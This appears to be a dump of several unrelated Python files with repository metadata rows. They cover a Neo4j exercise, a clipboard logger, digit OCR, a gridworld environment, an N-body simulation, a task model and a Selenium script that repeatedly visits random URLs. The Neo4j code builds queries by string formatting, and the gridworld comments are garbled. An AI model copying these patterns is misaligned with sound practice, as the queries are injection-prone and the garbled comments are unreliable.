"""
import utilities
import login_database
import utilities
log = utilities.configure_logger('default', '../logs/neo4j_assignment.log')
def add_people():
people = [
('Bob', 'Jones'),
('Nancy', 'Cooper'),
('Alice', 'Cooper'),
('Fred', 'Barnes'),
('Mary', 'Evans'),
('Marie', 'Curie'),
('Sally', 'Ride'),
('John', 'Glenn'),
('Neil', 'Armstrong')]
colors = ['red', 'blue', 'green', 'orange', 'yellow']
log.info('Step 1: First, clear the entire database, so we can start over')
log.info("Running clear_all")
driver = login_database.login_neo4j_cloud()
with driver.session() as session:
session.run("MATCH (n) DETACH DELETE n")
log.info("Step 2: Add a few people and colors.")
with driver.session() as session:
log.info('Adding a few Person nodes')
log.info('The cyph language is analagous to sql for neo4j')
for first, last in people:
cyph = "CREATE (n:Person {first_name:'%s', last_name: '%s'})" % (
first, last)
session.run(cyph)
log.info('Adding a few Color nodes')
for color in colors:
cyph = "CREATE (n:Color {color: '%s'})" % (color)
session.run(cyph)
log.info("Step 3: Get all of people in the DB:")
cyph = """MATCH (p:Person)
RETURN p.first_name as first_name, p.last_name as last_name
"""
result = session.run(cyph)
print("People in database:")
for record in result:
print(record['first_name'], record['last_name'])
log.info('Step 4: Create some favorite color relationships.')
log.info("Bob Jones likes red, orange, and yellow")
for color in ['red', 'orange', 'yellow']:
cyph = """
MATCH (p1:Person {first_name:'Bob', last_name:'Jones'})
CREATE (p1)-[favorite_color:FAVORITE_COLOR]->(c1:Color {color:'%s'})
RETURN p1
""" % color
session.run(cyph)
log.info("Sally likes green.")
cyph = """
MATCH (p1:Person {first_name:'Sally', last_name:'Ride'})
CREATE (p1)-[favorite_color:FAVORITE_COLOR]->(c1:Color {color:'green'})
RETURN p1
"""
session.run(cyph)
log.info("Neil likes blue.")
cyph = """
MATCH (p1:Person {first_name:'Neil', last_name:'Armstrong'})
CREATE (p1)-[favorite_color:FAVORITE_COLOR]->(c1:Color {color:'blue'})
RETURN p1
"""
session.run(cyph)
log.info("Alice likes blue.")
cyph = """
MATCH (p1:Person {first_name:'Alice', last_name:'Cooper'})
CREATE (p1)-[favorite_color:FAVORITE_COLOR]->(c1:Color {color:'blue'})
RETURN p1
"""
session.run(cyph)
log.info('Step 5: print the people who have each color as their favorite.')
for color in colors:
cyph = """
MATCH(c1 {color:'%s'})
-[:FAVORITE_COLOR]-(people)
RETURN people
""" % color
result = session.run(cyph)
print(f'People whose favorite color is {color}:')
for rec in result:
for person in rec.values():
print(person['first_name'], person['last_name'])
log.info("Step 6: Print each person's favorite color(s).")
for first, last in people:
cyph = """
MATCH(p1 {first_name:'%s', last_name:'%s'})
-[:FAVORITE_COLOR]->(colors)
RETURN colors""" % (first, last)
result = session.run(cyph)
print(f"{first}'s favorite color(s):")
for rec in result:
for color in rec.values():
print(color['color'])
| true |
aafb221dfbc826f17b21434092baade151d46494 | Python | thecoulter/ahk | /mymacros.py | UTF-8 | 318 | 3.0625 | 3 | [] | no_license | import tkinter as tk
def getClipboardText():
root = tk.Tk()
# keep the window from showing
root.withdraw()
return root.clipboard_get()
def putClipText():
f = open("extranotes.txt", "a+")
for x in getClipboardText():
f.write(x)
# print (x)
f.close()
putClipText()
| true |
5aab4929e8ab82bc407cba903a600d1dfa5290f8 | Python | sophos-proyectos/DemoAnalisisVisualPython | /cargar_Modelo.py | UTF-8 | 909 | 2.703125 | 3 | [] | no_license |
# Importan librerias
import joblib
from skimage.feature import hog
import numpy as np
import cv2
#Se carga el modelo
eje = joblib.load('Modelo.joblib')
# lee la imagen
im = cv2.imread("2.jpg")
#Escala de grises
im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
ret, im_th = cv2.threshold(im_gray, 90, 255, cv2.THRESH_BINARY_INV)
roi = cv2.resize(im_th, (28, 28))#, interpola
#HISTOGRAMA DE GRADIENTES ORIENTADOS
roi_hog_fd = hog(roi, orientations=9, pixels_per_cell=(14, 14), cells_per_block=(1, 1))
#Se predice
nbr = eje.predict(np.array([roi_hog_fd]))
#Se verifica tamaño para posicion de prediccion
height, width, channels = im.shape
#Se escribe la prediccion en la imagen
cv2.putText(im, str(int(nbr[0])), (int(height/4), int(width/2)),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 255, 255), 2)
#Se imprime la imagen
cv2.imshow("imagen_muestra",im)
cv2.waitKey()
| true |
f63b6897b821f8eb5bfe2e5c1635237e1570eeef | Python | supopur/divisibility-of-number | /deviders_of_number.py | UTF-8 | 1,113 | 4 | 4 | [] | no_license | to_devide = input("to devide: ")
#converts to float
to_devide = float(to_devide)
def Get_number(to_devide):
devider = 1
while True:
#devides the input number by the devider float
result = to_devide / devider
#converts the result to string so it can be processed
result = str(result)
#gets the number technicaly string that is after the dot
what_is_after_the_dot = result.partition('.')[2]
#converts it to float
what_is_after_the_dot = float(what_is_after_the_dot)
#prints the result if the number after the dot isn't more than 0
if not what_is_after_the_dot > 0:
print(devider, result)
#else:
#print('This was ejected', result, 'with devider of: ', devider)
#stops the script if the devider is bigger than the actual number we want to devide
#this is done so that we don't have infinite loop that is deviding 10 by 400 :D
if devider > to_devide:
break
devider += 1
Get_number(to_devide)
| true |
3485d55c35625384fa18e714632d1523ee260332 | Python | moming-studio/jupyter-notebook | /06-tf-项目/强化学习/gridworld.py | GB18030 | 1,678 | 2.828125 | 3 | [] | no_license | #
#һ
#ԣhttps://blog.csdn.net/qq_36686996/article/details/79595915
import numpy as np
from gym.envs.toy_text import discrete
#÷
UP = 0
RIGHT = 1
DOWN = 2
LEFT = 3
class GridWorldEnv(discrete.DiscreteEnv):
def __init__(self , shape = [4,4]):
self.shape = shape
self.nS = np.prod(self.shape)
self.nA = 4
Max_y = shape[0]
Max_x = shape[1]
p = {}
grid = np.arange(self.nS).reshape(shape)
it = np.nditer(grid , flags = ['multi_index'])
while not it.finished:
s = it.iterindex
y , x = it.multi_index
p[s] = {a : [] for a in range(self.nA)}
is_done = lambda s :s == 0 or s == (self.nS - 1)
reward = 0.0 if is_done(s) else -1.0
if is_done(s):
p[s][UP] = [(1.0 , s , reward , True)]
p[s][RIGHT] = [(1.0 , s , reward , True)]
p[s][DOWN] = [(1.0 , s , reward , True)]
p[s][LEFT] = [(1.0 , s , reward , True)]
else:
np_UP = s if y == 0 else s - Max_x
np_RIGHT = s if x == (Max_x - 1) else s + 1
np_DOWN = s if y == (Max_y - 1) else s + Max_x
np_LEFT = s if x == 0 else s - 1
p[s][UP] = [(1.0 , np_UP , reward , is_done(np_UP))]
p[s][RIGHT] = [(1.0 , np_RIGHT , reward , is_done(np_RIGHT))]
p[s][DOWN] = [(1.0 , np_DOWN , reward , is_done(np_DOWN))]
p[s][LEFT] = [(1.0 , np_LEFT , reward , is_done(np_LEFT))]
pass
it.iternext()
pass
self.p = p
pass | true |
8a439bafcbdfcea2ba76b1ccbfe99e896b43f571 | Python | DealerSo/Python | /spider_basic/file/fatch_data.py | UTF-8 | 585 | 3.3125 | 3 | [] | no_license | import os
import re
def fatch_data_from_file(file_name):
    """Print every <loc>...</loc> value found in *file_name*.

    If the file does not exist it is created empty instead (append mode),
    preserving the original best-effort behaviour.
    """
    if os.path.exists(file_name):
        # Context manager guarantees the handle is closed even if reading
        # or printing raises (the original relied on a manual close()).
        with open(file_name, 'r', encoding="utf-8") as fos:
            content = fos.read()
        # Non-greedy match extracts the text between each <loc> tag pair.
        for location in re.findall(r'<loc>(.*?)</loc>', content):
            print(location)
    else:
        # Bug fix: the handle returned by open(file_name, 'a') was never
        # closed; the context manager creates the file and closes it.
        with open(file_name, 'a', encoding="utf-8"):
            pass
# Script entry point: scan the default sitemap-style file in the CWD.
if __name__ == '__main__':
    fatch_data_from_file("data.txt")
0adf0cb8da2b42b68a482e96f236a775a8beaf4e | Python | bruffolo/PHYS512 | /Nbody/Orbit.py | UTF-8 | 11,188 | 2.53125 | 3 | [] | no_license | import numpy as np
from numpy.fft import rfftn,irfftn
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import time
import ctypes
from numba import jit
import sys
import os
wd = os.getcwd()
# Pull the hot-loop helpers from the companion C library (PM_methods.so
# must be built and discoverable next to this script).
c_lib = ctypes.cdll.LoadLibrary("PM_methods.so")
# Methods for the isolated boundary conditions.
# to_grid(x, y, z, grid, m, bc, npt, npix): deposits particles onto the mesh
# (see the pure-Python fallback to_grid_py below for the intended semantics).
to_grid = c_lib.to_grid
to_grid.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_long, ctypes.c_long]
# handle_isolated_boundaries(x, y, z, npt, npix): C-side treatment of
# out-of-grid particles — exact behaviour lives in the C source; argtypes below.
handle_isolated_boundaries = c_lib.handle_isolated_boundaries
handle_isolated_boundaries.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_long, ctypes.c_long]
def to_grid_py(xy, grid, cell_loc):
    """Pure-Python fallback for the C `to_grid`: snap each particle position
    in *xy* (shape (n, 3)) to its nearest cell, bump that cell's count in
    *grid*, and record the cell indices in *cell_loc* (shape (n, 3))."""
    snapped = np.asarray(np.round(xy), dtype='int')
    for idx, (gx, gy, gz) in enumerate(snapped):
        grid[gx, gy, gz] += 1
        cell_loc[idx] = gx, gy, gz
# System Configuration
npix = 2**6 # Grid cells per side
npt = 2 # Number of particles
ndim = 3 # Number of dimensions
# Particle mass parameters
m_equal = True # Set all masses to a common value (m_max)
m_random = False # Set masses of particles randomly in [m_min, m_min + m_max)
m_max = 1 # Maximum particle mass
m_min = 0.4 # Minimum particle mass
# Number of iterations
niter = 150000
# Time step
dt = 0.0001
# Check if user wants verbose printing to stdout
# NOTE(review): `verbose` is only assigned when argv[1] == '-b' or when no
# argument is given; any other first argument leaves it undefined and the
# later `if(verbose)` would raise NameError — confirm intended CLI contract.
try:
    if(sys.argv[1] == '-b'): verbose = True
except(IndexError):
    verbose = False
# Plotting parameters (during simulation)
show3D = False
nth = 1 # Plot every nth particle on screen
plt_iter = 1 # Plot particles every plt_iter iteration
# Data saving parameters
save_data = True
save_iter = 15 # Save position particle data every save_iter iteration
save_nth = 1 # Save position particle data every save_nth particle
x_file = "x_orbit_long.txt"
y_file = "y_orbit_long.txt"
z_file = "z_orbit_long.txt"
# Benchmark mode
benchmark = False
# Preferably if benchmark = True, set niter = 1, otherwise benchmark lines print every iteration!
# Potential test mode
potential_test = False
########################################
###          Green's function        ###
########################################
# Green's function of an isolated 1/r potential, sampled on a doubled grid
# so the FFT-based convolution does not wrap around (isolated BCs).
green_func = np.zeros([2*npix+1,2*npix+1,2*npix+1])
# Method to fill the Green's function array
@jit(nopython=True,parallel = True)
def get_H(H):
    """Fill one octant of H with 1/r, then mirror it into the other seven."""
    for i in range(npix+1):
        for j in range(npix+1):
            for k in range(npix+1):
                if(i == 0 and j == 0 and k == 0 ):
                    # Self-cell value: sets the force strength between
                    # particles sharing a cell (softening). Chosen by hand.
                    H[i,j,k] = 4/3 # Chose wisely
                else:
                    H[i,j,k] = 1/np.sqrt(i**2 + j**2 + k**2)
                #print("Progress: %.2f %%\r"%((i/npix)*100), end = '')
    #print()
    # Mirror the computed octant across every axis (1/r is even in i, j, k).
    for i in range(npix+1):
        for j in range(npix+1):
            for k in range(npix+1):
                h = H[i,j,k]
                H[ 2*npix-i , j , k ] = h
                H[ 2*npix-i , 2*npix-j , k ] = h
                H[ 2*npix-i , j , 2*npix-k ] = h
                H[ 2*npix-i , 2*npix-j , 2*npix-k ] = h
                H[ i , 2*npix-j , k ] = h
                H[ i , 2*npix-j , 2*npix-k ] = h
                H[ i , j , 2*npix-k ] = h
                #print("Progress: %.2f %%\r"%((i/npix)*100), end = '')
    #print()
get_H(green_func) # Make the Green's function array
green_ft = rfftn(green_func[:-1,:-1,:-1]) # Take the FT of Green's function array
#plt.imshow(green_func[:,:,0]);plt.colorbar();plt.show()
grid = np.zeros([2*npix,2*npix,2*npix]) # Make the (doubled) density grid array
########################################
###          Particle setup          ###
########################################
# Positions
x = np.zeros([npt])
y = np.zeros([npt])
z = np.zeros([npt])
# Masses
if(m_equal):
    m = np.ones([npt],dtype=float)*m_max
if(m_random):
    m = (np.random.rand(npt)*m_max) + m_min
# Velocities
vx = np.zeros([npt])
vy = np.zeros([npt])
vz = np.zeros([npt])
# Accelerations
ax = np.zeros([npt])
ay = np.zeros([npt])
az = np.zeros([npt])
# Starting positions: a heavy central body (particle 0) plus one light
# particle (particle 1) given the circular-orbit speed sqrt(M/r).
x[0] = npix/2
y[0] = npix/2
z[0] = npix/2
m[0] = 100000
x[1] = npix*(7.5/10)
y[1] = npix/2
z[1] = npix/2
vy[1] = np.sqrt(m[0]/(x[1]-x[0]))
'''
x[2] = npix*(1/10)
y[2] = npix/2
z[2] = npix/2
vy[2] = -np.sqrt(m[0]/(x[0]-x[2]))
x[3] = npix*(7.5/10)
y[3] = npix/2
z[3] = npix/1.8
vy[3] = -np.sqrt(m[0]/(x[3]-x[0]))
x[4] = npix*(6.5/10)
y[4] = npix/2
z[4] = npix/2
vy[4] = np.sqrt(m[0]/(x[4]-x[0]))
'''
# Potential-test mode overrides the run parameters and flattens z.
if(potential_test):
    npix = 64
    niter = 0
    show3D = False
    z[:] = npix//2
# Data saving arrays (will be printed to file)
if(save_data):
    x_save = np.zeros([niter//save_iter,npt//save_nth])
    y_save = x_save.copy()
    z_save = x_save.copy()
if(show3D): plt.ion()
# Print statements for the user summarising the run configuration.
if(verbose):
    print("\nPixel density: %d x %d x %d"%(npix,npix,npix))
    print("Number of particles: %d"%npt)
    print("Numer of iterations: ",niter)
    print("Time step: ",dt)
    if(show3D):
        print("\n3D Plot parameters:")
        print(">Number of plotted particles: %d"%(npt/nth))
        print(">Plot refreshed every %dth iteration"%(plt_iter))
    if(save_data):
        print("\nData save parameters: ")
        print(">Positional data of every %dth particle will be saved every %dth iteration"%(save_nth,save_iter))
        print(">Data will be saved in files: ",x_file,", ",y_file,", ",z_file)
    print()
if(benchmark):
    print("\n####### Benchmarks #######")
########################################
###          Initialization          ###
########################################
# Compute the initial accelerations once so the leapfrog loop below can
# start from a consistent (position, velocity, acceleration) state.
t91 = time.time() # Simulation start time
lx = np.asarray(np.round(x),dtype='int')
ly = np.asarray(np.round(y),dtype='int')
lz = np.asarray(np.round(z),dtype='int')
# This array will track out of bounds particles
bc = np.zeros([npt],dtype = 'int')
# Assign particles to the grid
to_grid(lx.ctypes.data, ly.ctypes.data, lz.ctypes.data, grid.ctypes.data, m.ctypes.data, bc.ctypes.data, npt, npix)
l = np.array([lx,ly,lz])
# Potential calculation: FFT convolution of density with the Green's function.
density_ft = rfftn(grid)
potential = irfftn(density_ft*green_ft)
# Acceleration calculation in every grid cell
Fx_prev,Fy_prev,Fz_prev = np.gradient(potential)
ax_prev = Fx_prev[tuple(l)]/m
ay_prev = Fy_prev[tuple(l)]/m
az_prev = Fz_prev[tuple(l)]/m
# Reset grid
grid.fill(0)
if(potential_test):
    plt.figure(1)
    plt.imshow(potential[:,:,npix//2].T,origin='lower');plt.colorbar()
    plt.show()
########################################
###             Main Loop            ###
########################################
# Leapfrog time integration: deposit -> FFT potential -> gradient forces ->
# kick/drift update, repeated niter times.
# NOTE(review): x_save/y_save/z_save only exist when save_data is True, but
# the loop writes (and the 3D plot reads) them unconditionally — running
# with save_data = False would raise NameError; confirm intended coupling.
if(show3D):
    fig = plt.figure(1)
    axs = plt.axes(projection='3d')
    axs.set_axis_off()
    axs.view_init(45,0 )
for t in range(niter):
    t11 = time.time()
    lx = np.asarray(np.round(x),dtype='int')
    ly = np.asarray(np.round(y),dtype='int')
    lz = np.asarray(np.round(z),dtype='int')
    # Assign particles to the grid
    to_grid(lx.ctypes.data, ly.ctypes.data, lz.ctypes.data, grid.ctypes.data,m.ctypes.data, bc.ctypes.data, npt, npix)
    t2 = time.time()
    if(benchmark):print("Grid snap calc. time: ",t2-t11)
    #-------------------------------------------------------------------------------------------------------------
    # Potential Calculation
    t1 = time.time()
    density_ft = rfftn(grid)
    potential = irfftn(density_ft*green_ft)
    t2 = time.time()
    if(benchmark):print("FFT calc. time: ",t2-t1)
    #-------------------------------------------------------------------------------------------------------------
    # Force calculation (only the physical npix^3 corner of the doubled grid)
    t1 = time.time()
    Fx,Fy,Fz = np.gradient(potential[:npix,:npix,:npix])
    t2 = time.time()
    if(benchmark):print("Gradient Calc. time: ",t2-t1)
    #-------------------------------------------------------------------------------------------------------------
    # Integration of particle positions and velocities (LEAPFROG method)
    t1 = time.time()
    # Update positions
    x = x + vx*dt + (1/2)*ax_prev*dt**2
    y = y + vy*dt + (1/2)*ay_prev*dt**2
    z = z + vz*dt + (1/2)*az_prev*dt**2
    # Save the position data
    if(t%save_iter == 0):
        x_save[t//save_iter] = x[::save_nth].copy()
        y_save[t//save_iter] = y[::save_nth].copy()
        z_save[t//save_iter] = z[::save_nth].copy()
    lx = np.asarray(np.round(x),dtype='int')
    ly = np.asarray(np.round(y),dtype='int')
    lz = np.asarray(np.round(z),dtype='int')
    handle_isolated_boundaries(lx.ctypes.data,ly.ctypes.data,lz.ctypes.data,npt,npix)
    l = np.array([lx,ly,lz])
    # Compute current acceleration
    ax = Fx[tuple(l)]/m
    ay = Fy[tuple(l)]/m
    az = Fz[tuple(l)]/m
    # Handle particles outside the grid >>> they feel no force from the grid bound mass.
    bc_flag = bc.astype(bool)
    ax[bc_flag] = 0
    ay[bc_flag] = 0
    az[bc_flag] = 0
    # Update velocities
    vx = vx + (1/2)*( ax_prev + ax )*dt
    vy = vy + (1/2)*( ay_prev + ay )*dt
    vz = vz + (1/2)*( az_prev + az )*dt
    # Save current forces
    ax_prev = ax.copy()
    ay_prev = ay.copy()
    az_prev = az.copy()
    t2 = time.time()
    if(benchmark):print("Integration time: ",t2-t1)
    else: print("Progress: %.2f %%, Rate: %.3f s/iter, Elasped time: %.2f s \r"%( (t/niter)*100,(t2-t11),(t2-t91) ), end = '')
    #-------------------------------------------------------------------------------------------------------------
    # Plotting
    if(show3D and t%plt_iter == 0):
        axs.clear()
        axs.set_axis_off()
        axs.plot3D(x_save[:t,1],y_save[:t,1],z_save[:t,1])
        axs.scatter3D(x_save[t,1],y_save[t,1],z_save[t,1])
        '''
        axs.scatter3D(x_save[t,2],y_save[t,2],z_save[t,2])
        axs.plot3D(x_save[:t,2],y_save[:t,2],z_save[:t,2])
        axs.scatter3D(x_save[t,3],y_save[t,3],z_save[t,3])
        axs.plot3D(x_save[:t,3],y_save[:t,3],z_save[:t,3])
        axs.scatter3D(x_save[t,4],y_save[t,4],z_save[t,4],color = "red")
        axs.plot3D(x_save[:t,4],y_save[:t,4],z_save[:t,4],color = "red")
        '''
        #axs.plot3D(x_save[:t,0],y_save[:t,0],z_save[:t,0])
        axs.scatter3D(x_save[t,0],y_save[t,0],z_save[t,0])
        axs.set_xlim([0,npix]);axs.set_ylim([0,npix]);axs.set_zlim([0,npix])
        plt.pause(0.001)
    #-------------------------------------------------------------------------------------------------------------
    # Reset the grid
    t1 = time.time()
    grid.fill(0)
    t2 = time.time()
    if(benchmark):print("Grid reset time: ",t2-t1)
    #-------------------------------------------------------------------------------------------------------------
t99 = time.time(); print("\n\nTotal simulation time: %.2f s"%(t99-t91))
# Save x,y and z data to files
if(save_data):
    if(verbose): print("\nSaving Data ...")
    np.savetxt(wd+"/Positional_data/"+x_file,x_save,delimiter=",")
    np.savetxt(wd+"/Positional_data/"+y_file,y_save,delimiter=",")
    np.savetxt(wd+"/Positional_data/"+z_file,z_save,delimiter=",")
    if(verbose): print("Save complete!")
a396a33d566263ac7eafd3c088cb3230fce6a796 | Python | ch4rl3salenc/ABS | /CognitiveDecision/CollectiveIntelligence/CollaborativeFiltering/critics.py | UTF-8 | 2,454 | 2.90625 | 3 | [] | no_license | #! python3
# a set of movies rate by different people
from CognitiveDecision.CollectiveIntelligence.CollaborativeFiltering.ranking import *
# Nested dict of movie ratings: critic name -> {movie title: score (0.0-5.0)}.
# Not every critic rated every movie — missing keys mean "not rated".
critics = {
    'Lisa Rose': {
        'Lady in the Water': 2.5, 'Snakes on a Plane': 3.5,
        'Just My Luck': 3.0, 'Superman Returns': 3.5, 'You, Me and Dupree': 2.5, 'The Night Listener': 3.0
    },
    'Gene Seymour': {
        'Lady in the Water': 3.0, 'Snakes on a Plane': 3.5,
        'Just My Luck': 1.5, 'Superman Returns': 5.0, 'The Night Listener': 3.0, 'You, Me and Dupree': 3.5
    },
    'Michael Phillips': {
        'Lady in the Water': 2.5, 'Snakes on a Plane': 3.0,
        'Superman Returns': 3.5, 'The Night Listener': 4.0
    },
    'Claudia Puig': {
        'Snakes on a Plane': 3.5, 'Just My Luck': 3.0,
        'The Night Listener': 4.5, 'Superman Returns': 4.0, 'You, Me and Dupree': 2.5
    },
    'Mick LaSalle': {
        'Lady in the Water': 3.0, 'Snakes on a Plane': 4.0,
        'Just My Luck': 2.0, 'Superman Returns': 3.0, 'The Night Listener': 3.0, 'You, Me and Dupree': 2.0
    },
    'Jack Matthews': {
        'Lady in the Water': 3.0, 'Snakes on a Plane': 4.0,
        'The Night Listener': 3.0, 'Superman Returns': 5.0, 'You, Me and Dupree': 3.5
    },
    'Toby': {
        'Snakes on a Plane': 4.5, 'You, Me and Dupree': 1.0,
        'Superman Returns': 4.0
    },
    'Chhatra': {
        'Harry Potter': 5, 'The Emoji': 5, 'Superman Returns': 4.0, 'You, Me and Dupree': 1.0
    },
    'Chhorm': {
        'Harry Potter': 5, 'The Emoji': 5, 'Hotel Trans.': 2.5, 'Lion king': 5
    }
}
# Matching Products
# convert from user => movie to movie => users
# 'Chhatra' : {'The Lion': 3.5 ..} => 'The Lion' : {'Chhatra':3.5..}
def transform_prefs(prefs):
    """Invert a person -> {item: rating} mapping into item -> {person: rating}.

    e.g. {'Chhatra': {'The Lion': 3.5}} becomes {'The Lion': {'Chhatra': 3.5}}.
    """
    inverted = {}
    for person, ratings in prefs.items():
        for item, score in ratings.items():
            inverted.setdefault(item, {})[person] = score
    return inverted
# matching movie
# to match this use top_matches function()
# e.g.
# movies = transform_prefs(critics)
# top_movies = top_matches(movies, 'Superman Returns')
# convert from user's based into item-based
def calculate_similar_items(prefs, n=10):
    """Build an item -> top-n-most-similar-items table from user preferences.

    Converts the user-based *prefs* to item-based form and scores each item
    against all others via top_matches.
    """
    item_prefs = transform_prefs(prefs)
    similar = {}
    for count, item in enumerate(item_prefs, start=1):
        # Progress indicator for large item sets.
        if count % 100 == 0:
            print('%d' % (count / len(item_prefs)))
        similar[item] = top_matches(item_prefs, item, n=n)
    return similar
| true |
a6eda14f789252e953eb3ca772b362874a2cc4ca | Python | rishikumarr/Python | /Data Science/Seaborn/Regression Plot/RegressionPlot.py | UTF-8 | 1,329 | 2.984375 | 3 | [] | no_license | import seaborn as sns
from matplotlib import pyplot as plt
# Tutorial file: each commented line below is one lmplot variation to try.
# NOTE(review): every plot call is commented out, so plt.show() currently
# displays nothing — uncomment one example before running.
tips=sns.load_dataset("tips")
# print(tips)
# sns.lmplot(x="total_bill",y="tip",data=tips)
# Adding Hue
# sns.lmplot(x="total_bill",y="tip",data=tips,hue='sex')
# Adding Markers
# sns.lmplot(x="total_bill",y="tip",data=tips,hue='sex',markers=['o','v'])
# Specifying Size To Markers
# sns.lmplot(x="total_bill",y="tip",data=tips,hue='sex',markers=['o','v'],scatter_kws={'s':100})
# Adding column and row
# sns.lmplot(x="total_bill",y="tip",data=tips,col='sex') # Adding Columns
# sns.lmplot(x="total_bill",y="tip",data=tips,row="time") # Adding Rows
# sns.lmplot(x="total_bill",y="tip",data=tips,row="time",col="sex") # Adding Both Rows And Columns
# sns.lmplot(x="total_bill",y="tip",data=tips,row="time",col="sex") # Adding Both Rows And Columns
# Adding hue
# sns.lmplot(x="total_bill",y="tip",data=tips,row="time",col="day",hue="sex")
# sns.lmplot(x="total_bill",y="tip",data=tips,col="day",hue="sex",markers=['o','v'])
# Adding Size To Plot
# sns.lmplot(x="total_bill",y="tip",data=tips,col="day",hue="sex",markers=['o','v'],aspect=0.6,height=8)
plt.show()
| true |
129ab8ecfa0deb344458c9fa24c5f7a052049a58 | Python | HackerSchool-AC/PythonArt | /Code-Beispiele/Beispiele-4/KreisSechseck_1.py | UTF-8 | 690 | 3.515625 | 4 | [] | no_license | from turtle import *
# NOTE(review): `tina` is created but never used — all drawing below goes
# through the module-level (anonymous) turtle; confirm this is intended.
tina = Turtle(shape = "turtle")
# tracer(False)  # uncomment to disable animation for instant drawing
def maleKreis(radius, farbe):
    """Draw a filled circle of the given radius and fill colour, centred on
    the current position ('male Kreis' = 'draw circle')."""
    # Walk out to the rim; the turn makes circle() sweep around the centre.
    forward(radius)
    left(90)
    # Draw the circle.
    pendown()
    pensize(2)
    fillcolor(farbe)
    begin_fill()
    circle(radius)
    end_fill()
def maleSechseck(seite, farbe):
    """Draw a filled regular hexagon with side length *seite* and fill
    colour *farbe* ('male Sechseck' = 'draw hexagon')."""
    # Walk out to the first vertex.
    forward(seite)
    left(120)
    # Draw the hexagon: six sides with 60-degree exterior turns.
    pendown()
    pensize(2)
    fillcolor(farbe)
    begin_fill()
    for i in range(6):
        forward(seite)
        left(60)
    end_fill()
# Move to the centre, then draw the red circle.
penup()
goto(0, 0)
maleKreis(300, "red")
# Back to the centre, then draw the blue hexagon on top.
penup()
goto(0, 0)
maleSechseck(300, "blue")
Screen().exitonclick()
| true |
6fde82cef390e617af7283ccd0d77bbf7f5c5440 | Python | madeindjs/pomodore_manager | /classes/task.py | UTF-8 | 1,605 | 2.65625 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from view.writter import Writter
from classes.model import Model
from classes.worktime import WorkTime
class Task(Model):
    """A single row of the ``tasks`` table; a task may own subtasks
    (rows whose ``node_id`` points at it) and worktime entries."""

    table_name = 'tasks'
    attrs = ['id', 'node_id', 'name', 'description', 'status']

    def delete(self):
        """Delete this task and every subtask linked to it.

        Returns True on success, False when the object has no ``id``.
        """
        Writter.event('delete task n°{} and subtasks linked'.format(self.id))
        try:
            data = {'id': self.id, 'node_id': self.id}
            sql_query = "DELETE FROM {} WHERE id = :id OR node_id = :node_id".format(self.table_name)
            self.database.cursor_execute(sql_query, data)
            self.database.connection.commit()
            return True
        except AttributeError:
            print('Object have not id property')
            return False

    def subtasks(self):
        """Yield every subtask of this task as a Task instance.

        Bug fix: the previous version did ``yield tasks.append(Task(...))``,
        which raised NameError (``tasks`` was never defined) and would have
        yielded None in any case; it also logged a misleading 'delete'
        event message.
        """
        Writter.event('fetch subtasks of task n°{}'.format(self.id))
        data = {"id": self.id}
        sql_query = "SELECT id FROM tasks WHERE node_id = :id"
        result = self.database.cursor_execute(sql_query, data).fetchall()
        for row in result:
            yield Task(row[0])

    @property
    def worktimes(self):
        """Yield the WorkTime entries recorded against this task."""
        data = {"task_id": self.id}
        sql_query = "SELECT id, task_id FROM worktimes WHERE task_id=:task_id"
        result = self.database.cursor_execute(sql_query, data).fetchall()
        for row in result:
            yield WorkTime(id=row[0])

    @property
    def spended_time(self):
        """Total time spent on this task, as a datetime.timedelta."""
        total_seconds = 0
        for worktime in self.worktimes:
            total_seconds += worktime.time
        return datetime.timedelta(seconds=total_seconds)
0fa9a7c2839c3e9767a02cee23125d844b690587 | Python | dx2ly/buy_pig_plan_python-1 | /main.py | UTF-8 | 1,490 | 3.03125 | 3 | [
"MIT"
] | permissive | import json
import random
import time
import os
from selenium.webdriver.support.wait import WebDriverWait
from config import settings
from task import single_task
def main():
    """
    Program entry point: run settings['times'] visit tasks against randomly
    chosen URLs and print a success/error tally at the end.
    :return: None
    """
    driver = setup_driver()
    wait = WebDriverWait(driver, settings['timeout'])
    url_list = get_url_list()
    count_result = {'success': 0, 'error': 0, 'sum': settings['times']}
    for i in range(settings['times']):
        # random.choice replaces the manual randint index arithmetic.
        url = random.choice(url_list)
        print(f'--------------TASK {i + 1}: {url["name"]} {url["url"]} --------------')
        result = single_task(driver, url['url'], wait)
        print(result)
        count_result[result['status']] += 1
        if result['status'] == 'success':
            # Brief pause between successful visits.
            time.sleep(2)
    print(f'\n{count_result}')
    driver.close()
def setup_driver():
    """
    Initialise the selenium driver from settings: apply page-load/script
    timeouts and a fixed 1024x768 window.
    :return: the configured driver
    """
    driver = settings['driver']
    driver.set_page_load_timeout(settings['timeout'])
    driver.set_script_timeout(settings['timeout'])
    driver.set_window_rect(0, 0, 1024, 768)
    return driver
def get_url_list():
    """
    Pick one JSON file from ./assets at random and return its parsed
    contents (a list of dicts with 'name' and 'url' keys).
    :return: list of dict, the URL list
    """
    file_list = os.listdir('assets')
    # random.choice is the idiomatic equivalent of
    # file_list[random.randint(0, len(file_list) - 1)].
    filepath = os.path.join('assets', random.choice(file_list))
    # Explicit encoding: JSON files are UTF-8 regardless of platform locale.
    with open(filepath, encoding='utf-8') as f:
        url_list = json.load(f)
    return url_list
# Script entry point.
if __name__ == '__main__':
    main()
| true |
10a9a9c3ff04202d309f8c29255ff6e7a9a4b838 | Python | bourbaki-py/introspection | /bourbaki/introspection/subclassing.py | UTF-8 | 9,442 | 2.734375 | 3 | [
"Apache-2.0"
] | permissive | # coding:utf-8
from types import MethodType
from functools import update_wrapper
from inspect import signature, Signature, Parameter
from .callables import bind_verbosely, validate_overrides, merged_signature
# decorators
def subclass_mutator_method(
    wrapped_method_or_class,
    call_wrapped_first=True,
    call_wrapped_manually=False,
    wrapped_is_method=True,
    concat_docs=True,
):
    """Decorator factory for overriding a mutator method (typically
    ``__init__``) in a subclass.

    Apply as ``@subclass_mutator_method(SuperClass)`` to an override that
    merely adds arguments or changes defaults. By default the parent method
    is called first with the subset of arguments it accepts, then the
    decorated method runs with all of them; pass
